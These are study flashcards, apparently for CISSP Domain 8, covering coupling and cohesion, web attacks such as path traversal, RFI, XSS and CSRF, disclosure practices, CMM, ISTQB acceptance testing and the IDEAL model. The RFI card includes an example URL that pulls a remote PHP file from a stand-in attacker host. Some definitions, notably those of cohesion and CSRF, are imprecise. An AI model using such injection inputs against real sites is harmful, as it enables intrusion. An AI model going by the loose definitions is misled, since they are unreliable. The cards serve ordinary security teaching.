Domain 8: Software Security

Question 1

• OOP Term

- Used to describe level of an object’s dependence on other objects

Answer 1

Coupling

Question 2

• OOP Term

- Used to describe the level of an object’s independence of other objects

Answer 2

Cohesion

Question 3

• OOP Terms

- Object that greatly depends on another object

Answer 3

High Coupling and Low Cohesion

Question 4

• OOP Terms

- Object that is mostly independent from other objects

Answer 4

High Cohesion and Low Coupling

Question 5

• Used to locate objects act as search engines
• Connects programs to programs
• i.e. COM, DCOM, CORBA

Answer 5

Object Request Brokers (ORBs)

Question 6

Escaping from the root of the web server (i.e. /var/www) into the regular file system by referencing directories such as “../’’”

Answer 6

Directory Path Traversal

Question 7

Altering normal PHP URLs and variable to include and execute remote content
i.e. http://good.example.com?file=http://evil.example.com/bad.php

Answer 7

Remote File Inclusion (RFI)

Question 8

Attacker attempts to alter a condition after it has been checked by the OS, but before it is used

Answer 8

Time of check/Time of use (TOC/TOU) attacks aka Race conditions

Question 9

Leverages third-party execution of scripting languages within the security context of a trusted site

Answer 9

Cross-site scripting (XSS)

Question 10

Leverages a third-party redirect of static content within the security context of a trusted site

Answer 10

Cross-site request forgery (CSRF)

Question 11

Describes actions taken by the security researcher after discovering a software vulnerability

Answer 11

Disclosure

Question 12

Practice of releasing vulnerability details publicly

Answer 12

Full disclosure

Question 13

Practice of privately sharing vulnerability info with a vendor and withholding public release until a patch is available

Answer 13

Responsible disclosure

Question 14

• Framework intended help software organizations improve the maturity and quality of the software process
• Categorizes 5 stages organization software processes go through to reach maturity
• Maturity framework for evaluating and improving the software development process

Answer 14

Software Capability Maturity Model (CMM)

Question 15

Name the 5 stages of the Software Capability Maturity Model (CMM)

Answer 15

1. Initial
2. Repeatable
3. Defined
4. Managed
5. Optimizing

Question 16

• Software Capability Maturity Model (CMM) stage

- Little to no software processes are defined

Answer 16

Initial

Question 17

• Software Capability Maturity Model (CMM) stage
• Basic project management processes are established to track cost, schedule, and functionality.
• Code is reused in similar projects to duplicate results

Answer 17

Repeatable

Question 18

• Software Capability Maturity Model (CMM) stage
• The software process for both management and engineering activities is documented, standardized, and integrated into standard software process for the organization

Answer 18

Defined

Question 19

• Software Capability Maturity Model (CMM) stage
• Detailed quantitative measures of the software process and product quality are collected, analyzed, and used to control the process.

Answer 19

Managed

Question 20

• Software Capability Maturity Model (CMM) stage
• Continual process improvement is enabled by quantitative feedback from the process and from piloting innovative ideas and technologies.

Answer 20

Optimizing

Question 21

• Examines whether software meets various end-state requirements,
• i.e. from a user or customer, contract, or compliance

Answer 21

Acceptance Testing

Question 22

• International Software Testing Qualifications Board (ISTQB) acceptance testing level
• Focuses on the validating the fitness-for-use of the system by the business user

Answer 22

User Acceptance Test

Question 23

• International Software Testing Qualifications Board (ISTQB) acceptance testing level
• Validates whether the system meets the requirements for operation

Answer 23

Operational Acceptance test

Question 24

• International Software Testing Qualifications Board (ISTQB) acceptance testing level
• Performed against contract’s acceptance criteria for producing custom-developed software

Answer 24

Contract Acceptance testing

Question 25

• International Software Testing Qualifications Board (ISTQB) acceptance testing level
• Performed against the regulations that must be followed i.e. government, safety, etc.

Answer 25

Compliance Acceptance testing

Question 26

Alternate to Software Capability Maturity Model for software development processes

Answer 26

IDEAL Model

Question 27

List the 5 stages of the IDEAL Model Stages

Answer 27

1. Initiating
2. Diagnosing
3. Establishing
4. Acting
5. Learning

Question 28

• IDEAL Model Stage
• Business reasons behind the change are outline, support is built for the initiative, and the the appropriate infrastructure is put in place

Answer 28

Initiating

Question 29

• IDEAL Model Stage

- Engineers analyze the current state of the organization and make general recommendations for change

Answer 29

Diagnosing

Question 30

• IDEAL Model Stage
• Organization takes the general recommendations from the diagnosing phase and develops a specific plan of action that helps achieve those changes

Answer 30

Establishing

Question 31

• IDEAL Model Stage

- Organization develops solutions and then tests, refines, and implements them.

Answer 31

Acting

Question 32

• IDEAL Model Stage
• Organization must continuously analyze its efforts to determine whether it has achieved the desired goals and, when necessary, propose new actions to put the organization back on course

Answer 32

Learning